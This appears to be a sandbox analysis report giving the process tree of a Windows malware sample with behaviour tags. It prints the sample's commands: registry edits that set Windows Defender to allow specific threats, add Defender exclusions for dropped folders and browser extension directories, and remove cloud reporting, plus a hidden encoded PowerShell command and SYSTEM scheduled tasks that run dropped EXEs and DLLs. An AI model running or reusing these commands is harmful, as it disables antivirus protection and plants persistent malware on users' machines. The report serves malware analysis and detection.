- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2312
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2076
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:323⤵PID:2264
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:324⤵PID:2536
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:323⤵PID:3920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:643⤵PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:323⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:643⤵PID:232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:323⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:643⤵PID:2328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:323⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:643⤵PID:684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:323⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:643⤵PID:2788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:323⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:643⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:323⤵PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:643⤵PID:4136
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQPWYPbvw" /SC once /ST 04:42:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQPWYPbvw"2⤵PID:224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQPWYPbvw"2⤵PID:4120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 05:39:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\VhpOyAw.exe\" nf /Iisite_idOof 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AtBWxWZQPczPtNlnn"2⤵PID:4456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4704
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:564
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5072
-
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\VhpOyAw.exeC:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\VhpOyAw.exe nf /Iisite_idOof 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"2⤵PID:4436
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:392
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1072
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2772
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\noWpkS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\iLdHFDc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tPKRaMnTrSPPzpw"2⤵PID:4924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"2⤵PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\NsTdapB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\QWfwmrs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\ClevaNC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\hnFUuek.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 06:53:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\QwGxxFGD\sOpDwtd.dll\",#1 /gksite_idTwy 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GZVqxQnXgrdNzWCPM"2⤵PID:788
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4748
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2016
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"2⤵PID:1072
-
-
